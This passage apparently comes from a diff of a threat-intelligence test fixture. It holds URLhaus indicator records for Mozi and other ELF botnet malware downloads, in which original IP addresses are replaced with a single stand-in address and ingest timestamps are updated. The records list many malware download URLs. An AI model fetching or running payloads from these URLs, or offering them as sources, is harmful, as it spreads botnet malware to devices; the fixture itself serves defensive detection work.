"full": "http://222.137.133.120:32915/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32915/Mozi.m" }, - "ip": "222.137.133.120" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694281985Z", - "original": "{\"id\":\"961073\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961073/\",\"url\":\"http://222.137.133.120:32915/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.133.120\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028008900Z", + "original": "{\"id\":\"961073\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961073/\",\"url\":\"http://89.160.20.156:32915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23111,18 +23111,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://222.137.123.31:43462/Mozi.a", + "original": "http://89.160.20.156:43462/Mozi.a", "scheme": "http", "port": 43462, - "domain": "222.137.123.31", - "full": "http://222.137.123.31:43462/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43462/Mozi.a" }, - "ip": "222.137.123.31" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694286534Z", - "original": "{\"id\":\"961074\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961074/\",\"url\":\"http://222.137.123.31:43462/Mozi.a\",\"url_status\":\"online\",\"host\":\"222.137.123.31\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028016100Z", + "original": "{\"id\":\"961074\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961074/\",\"url\":\"http://89.160.20.156:43462/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23160,18 +23160,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.157.163.74:33291/Mozi.m", + "original": "http://89.160.20.156:33291/Mozi.m", "scheme": "http", "port": 33291, - "domain": "219.157.163.74", - "full": "http://219.157.163.74:33291/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33291/Mozi.m" }, - "ip": "219.157.163.74" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694290181Z", - "original": "{\"id\":\"961075\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961075/\",\"url\":\"http://219.157.163.74:33291/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.163.74\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028023Z", + "original": "{\"id\":\"961075\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961075/\",\"url\":\"http://89.160.20.156:33291/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23209,18 +23209,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://220.125.119.222:1440/Mozi.m", + "original": "http://89.160.20.156:1440/Mozi.m", "scheme": "http", "port": 1440, - "domain": "220.125.119.222", - "full": "http://220.125.119.222:1440/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:1440/Mozi.m" }, - "ip": "220.125.119.222" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694294699Z", - "original": "{\"id\":\"961076\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961076/\",\"url\":\"http://220.125.119.222:1440/Mozi.m\",\"url_status\":\"offline\",\"host\":\"220.125.119.222\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028030Z", + "original": "{\"id\":\"961076\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961076/\",\"url\":\"http://89.160.20.156:1440/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23258,18 +23258,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://123.10.35.174:55907/Mozi.a", + "original": "http://89.160.20.156:55907/Mozi.a", "scheme": "http", "port": 55907, - "domain": "123.10.35.174", - "full": "http://123.10.35.174:55907/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55907/Mozi.a" }, - "ip": "123.10.35.174" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694298056Z", - "original": "{\"id\":\"961068\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961068/\",\"url\":\"http://123.10.35.174:55907/Mozi.a\",\"url_status\":\"online\",\"host\":\"123.10.35.174\",\"date_added\":\"2021-01-14 17:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028036800Z", + "original": "{\"id\":\"961068\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961068/\",\"url\":\"http://89.160.20.156:55907/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23307,18 +23307,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.247.201.31:33181/Mozi.a", + "original": "http://89.160.20.156:33181/Mozi.a", "scheme": "http", "port": 33181, - "domain": "117.247.201.31", - "full": "http://117.247.201.31:33181/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33181/Mozi.a" }, - "ip": "117.247.201.31" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694301552Z", - "original": "{\"id\":\"961066\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961066/\",\"url\":\"http://117.247.201.31:33181/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.247.201.31\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028043900Z", + "original": "{\"id\":\"961066\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961066/\",\"url\":\"http://89.160.20.156:33181/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23356,18 +23356,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.150.204:44691/Mozi.m", + "original": "http://89.160.20.156:44691/Mozi.m", "scheme": "http", "port": 44691, - "domain": "182.121.150.204", - "full": "http://182.121.150.204:44691/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44691/Mozi.m" }, - "ip": "182.121.150.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694305399Z", - "original": "{\"id\":\"961067\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961067/\",\"url\":\"http://182.121.150.204:44691/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.150.204\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028050800Z", + "original": "{\"id\":\"961067\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961067/\",\"url\":\"http://89.160.20.156:44691/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23405,18 +23405,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.42.26.224:55254/Mozi.m", + "original": "http://89.160.20.156:55254/Mozi.m", "scheme": "http", "port": 55254, - "domain": "125.42.26.224", - "full": "http://125.42.26.224:55254/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55254/Mozi.m" }, - "ip": "125.42.26.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694309086Z", - "original": "{\"id\":\"961059\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961059/\",\"url\":\"http://125.42.26.224:55254/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.42.26.224\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028057700Z", + "original": "{\"id\":\"961059\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961059/\",\"url\":\"http://89.160.20.156:55254/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23454,18 +23454,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.24:43010/Mozi.m", + "original": "http://89.160.20.156:43010/Mozi.m", "scheme": "http", "port": 43010, - "domain": "186.33.123.24", - "full": "http://186.33.123.24:43010/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43010/Mozi.m" }, - "ip": "186.33.123.24" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694313104Z", - "original": "{\"id\":\"961060\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961060/\",\"url\":\"http://186.33.123.24:43010/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.24\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028065200Z", + "original": "{\"id\":\"961060\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961060/\",\"url\":\"http://89.160.20.156:43010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23503,18 +23503,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.217.246:37886/Mozi.m", + "original": "http://89.160.20.156:37886/Mozi.m", "scheme": "http", "port": 37886, - "domain": "125.41.217.246", - "full": "http://125.41.217.246:37886/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37886/Mozi.m" }, - "ip": "125.41.217.246" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694316691Z", - "original": "{\"id\":\"961061\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961061/\",\"url\":\"http://125.41.217.246:37886/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.41.217.246\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028072500Z", + "original": "{\"id\":\"961061\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961061/\",\"url\":\"http://89.160.20.156:37886/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23552,18 +23552,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.77.111:40153/Mozi.m", + "original": "http://89.160.20.156:40153/Mozi.m", "scheme": "http", "port": 40153, - "domain": "182.116.77.111", - "full": "http://182.116.77.111:40153/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40153/Mozi.m" }, - "ip": "182.116.77.111" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694320197Z", - "original": "{\"id\":\"961062\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961062/\",\"url\":\"http://182.116.77.111:40153/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.77.111\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028079500Z", + "original": "{\"id\":\"961062\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961062/\",\"url\":\"http://89.160.20.156:40153/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23601,18 +23601,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.92.19:34305/Mozi.a", + "original": "http://89.160.20.156:34305/Mozi.a", "scheme": "http", "port": 34305, - "domain": "182.117.92.19", - "full": "http://182.117.92.19:34305/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34305/Mozi.a" }, - "ip": "182.117.92.19" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694323603Z", - "original": "{\"id\":\"961063\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961063/\",\"url\":\"http://182.117.92.19:34305/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.92.19\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028086400Z", + "original": "{\"id\":\"961063\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961063/\",\"url\":\"http://89.160.20.156:34305/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23650,18 +23650,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.127.97.21:35653/Mozi.m", + "original": "http://89.160.20.156:35653/Mozi.m", "scheme": "http", "port": 35653, - "domain": "182.127.97.21", - "full": "http://182.127.97.21:35653/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35653/Mozi.m" }, - "ip": "182.127.97.21" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694327200Z", - "original": "{\"id\":\"961064\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961064/\",\"url\":\"http://182.127.97.21:35653/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.127.97.21\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028093200Z", + "original": "{\"id\":\"961064\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961064/\",\"url\":\"http://89.160.20.156:35653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23699,18 +23699,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.242.209.98:48908/Mozi.m", + "original": "http://89.160.20.156:48908/Mozi.m", "scheme": "http", "port": 48908, - "domain": "117.242.209.98", - "full": "http://117.242.209.98:48908/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48908/Mozi.m" }, - "ip": "117.242.209.98" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694330647Z", - "original": "{\"id\":\"961065\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961065/\",\"url\":\"http://117.242.209.98:48908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.242.209.98\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028100200Z", + "original": "{\"id\":\"961065\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961065/\",\"url\":\"http://89.160.20.156:48908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23748,18 +23748,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.118.12.200:40035/Mozi.m", + "original": "http://89.160.20.156:40035/Mozi.m", "scheme": "http", "port": 40035, - "domain": "113.118.12.200", - "full": "http://113.118.12.200:40035/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40035/Mozi.m" }, - "ip": "113.118.12.200" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694334414Z", - "original": "{\"id\":\"961058\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961058/\",\"url\":\"http://113.118.12.200:40035/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.118.12.200\",\"date_added\":\"2021-01-14 17:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028107Z", + "original": "{\"id\":\"961058\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961058/\",\"url\":\"http://89.160.20.156:40035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23797,18 +23797,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.222.166.125:54461/Mozi.a", + "original": "http://89.160.20.156:54461/Mozi.a", "scheme": "http", "port": 54461, - "domain": "117.222.166.125", - "full": "http://117.222.166.125:54461/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54461/Mozi.a" }, - "ip": "117.222.166.125" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694338151Z", - "original": "{\"id\":\"961055\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961055/\",\"url\":\"http://117.222.166.125:54461/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.222.166.125\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028114Z", + "original": "{\"id\":\"961055\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961055/\",\"url\":\"http://89.160.20.156:54461/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23846,18 +23846,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.75.214.130:51991/Mozi.m", + "original": "http://89.160.20.156:51991/Mozi.m", "scheme": "http", "port": 51991, - "domain": "116.75.214.130", - "full": "http://116.75.214.130:51991/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51991/Mozi.m" }, - "ip": "116.75.214.130" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694342269Z", - "original": "{\"id\":\"961056\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961056/\",\"url\":\"http://116.75.214.130:51991/Mozi.m\",\"url_status\":\"offline\",\"host\":\"116.75.214.130\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028120900Z", + "original": "{\"id\":\"961056\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961056/\",\"url\":\"http://89.160.20.156:51991/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23895,18 +23895,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://112.168.65.51:41143/i", + "original": "http://89.160.20.156:41143/i", "scheme": "http", "port": 41143, - "domain": "112.168.65.51", - "full": "http://112.168.65.51:41143/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41143/i" }, - "ip": "112.168.65.51" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694345765Z", - "original": "{\"id\":\"961057\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961057/\",\"url\":\"http://112.168.65.51:41143/i\",\"url_status\":\"online\",\"host\":\"112.168.65.51\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028127700Z", + "original": "{\"id\":\"961057\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961057/\",\"url\":\"http://89.160.20.156:41143/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23944,18 +23944,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://221.15.254.11:51095/i", + "original": "http://89.160.20.156:51095/i", "scheme": "http", "port": 51095, - "domain": "221.15.254.11", - "full": "http://221.15.254.11:51095/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51095/i" }, - "ip": "221.15.254.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694349422Z", - "original": "{\"id\":\"961054\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961054/\",\"url\":\"http://221.15.254.11:51095/i\",\"url_status\":\"online\",\"host\":\"221.15.254.11\",\"date_added\":\"2021-01-14 17:02:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.028134600Z", + "original": "{\"id\":\"961054\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961054/\",\"url\":\"http://89.160.20.156:51095/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:02:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23993,18 +23993,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": 